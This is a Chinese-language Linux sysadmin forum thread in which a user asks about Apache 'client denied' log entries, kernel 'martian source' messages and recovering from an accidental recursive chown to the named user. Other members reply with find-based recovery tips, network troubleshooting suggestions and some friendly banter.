[Sat Oct 10 14:30:31 2009] [error] [client 219.84.252.175] client denied by server configuration: /home/jmagcomt/www/images/epaper_order_break02up.jpg, referer: http://tw.mc734.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255155044&.rand=6gcu6ek2jusdf
[Sat Oct 10 14:30:31 2009] [error] [client 219.84.252.175] client denied by server configuration: /home/jmagcomt/www/images/epaper_order_break02up.jpg, referer: http://tw.mc734.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255155044&.rand=6gcu6ek2jusdf
[Sat Oct 10 14:30:33 2009] [error] [client 219.84.252.175] File does not exist: /home/jmagcomt/www/images/hotbanner.gi f, referer: http://tw.mc734.mail.yahoo.com/mc/welcome?.gx=1&.tm=1255155044&.rand=6gcu6ek2jusdf

想請問遭到這類攻擊時該怎麼辦呢?
對方IP一直再跳換,就這樣看著她用不同的IP連結我的網站,然後跳出一堆File does not exist...
是因為這樣才讓網站被癱瘓掉的嗎? 我的MRTG的流量雖然沒啥增減,但速度變慢卻是事實...

另外,最近在主機的message.log裡也看到大量的 kernel: martian source...火星連線
去Google上查看了大家都說這不要緊,可以省略掉不看
但我好奇的是以前從沒看過這個東西,為何現在兩台主機都會看到?
該如何處理才好? 照著這篇文章說的關掉rp_filter真的安全嗎?
會不會有什麼其它問題產生?

25
你先看你named的uid gid(xxx,zzz)
然後
find / -uid xxx
find / -gid zzz
就會看到你改的檔案和目錄了
詳細使用請看man find

感謝大大!! 我就是要這個!! 嗚嗚~~~ 幸好我還有另外一台主機可以對照正確的ID,好險好險...

26
抱歉 ... 是小弟笨

在 194 打
#ftp ftp.adsl.hinet.net
不就知道有沒有檔了 ... 一.一

的確如您所料,連線失敗被擋了 @@"

27
我又來了.... 這次因為重度腦殘加手賤
不小心下了道指令把一些重要的檔案以及資料夾 chown -R named.named ??????
結果MAIL掛了、然後/etc裡面的一些資料也被改到... 連/var & /lib & /usr 都有改到!?

疲於一個一個尋找之下,請教各位大大有沒有什麼密技指令可以讓我直接找出這個named的使用者或群組方式?
我現在也無法正常使用pietty軟體遠端操作,帳號都可直接登入,但怎麼 su 都會失敗,所以不得以情況下,只好暫時開放允許root登入... Orz

28
糟糕 ..... 先別做喔 ..... 妳是 ssh ..... 先準備背景執行復原的 script 喔

201 是可正常連線的,主要負責的是MAIL工作
194 是無法連線,主要負責的是WEB網站
這兩個都已經在上線運作了,不太方便off line... @@

請問是要我將201的網路線拔掉,改放在194這台上,然後連同194這台的network都要一併改成201的IP?
我不太敢弄耶,得勞煩IDC的人員半夜幫我弄XD

29
^^
天氣悶熱 ... 所以出現好幾篇無心犯下的有心之過


這 traceroute 資料並看不出問題點
只知 198 是做 gateway
不知有沒有 firewall 功能

或這台 linux 本身 .. iptables-save 看看

ping 是 icmp ; traceroute 在 linux 下好像預設 udp (請指教)
印像中不一樣協定 .. 所以 ping ok trace 不行 ... 小弟會朝是否有 filter 設備思索

雖然都快 35 歲了 ... 在這裡還是小弟阿 (真好奇誰會先跳出來 ... jou 大嗎 ??)

呵呵~~ 的確是該來杯苦茶消消暑吧XD
我覺得我到50歲還是會在這裡小妹小妹的叫吧... Orz

這兩台主機都是在相同的系統、硬體設備為前提下,個別擁有獨立的IP與頻寬,然後各加一塊網卡跳線作區網
iptable防火牆都沒有開啟,因為是統一使用IDC的硬體防火牆
不知道該如何查詢問題出在哪,該提供什麼設定檔上來,因為看不到錯誤的LOG產生... 唉

30
少裝了,來這問問題還故意開頭用小妹.....

黑啊,你是男的

證據在: http://cn.2girl.net/gate/gb/blog.2girl.net/index.php/74899/action-viewpro-showpro-1

大大你太有心了連證據都找出來~厲害~

挖~~ 大大您實在太有心,真是沒想到連這都能被你挖到XDDDD
那個網站是絕不會有男生的~ 因為那是一個性別相關的網誌... 苦笑 (性別與性向不太相同喔~)
大大要看真相的話,應該要來這邊才對:http://blog.yam.com/user/rei92.html
有圖有真相咩XD

頁: [1] 2 3 4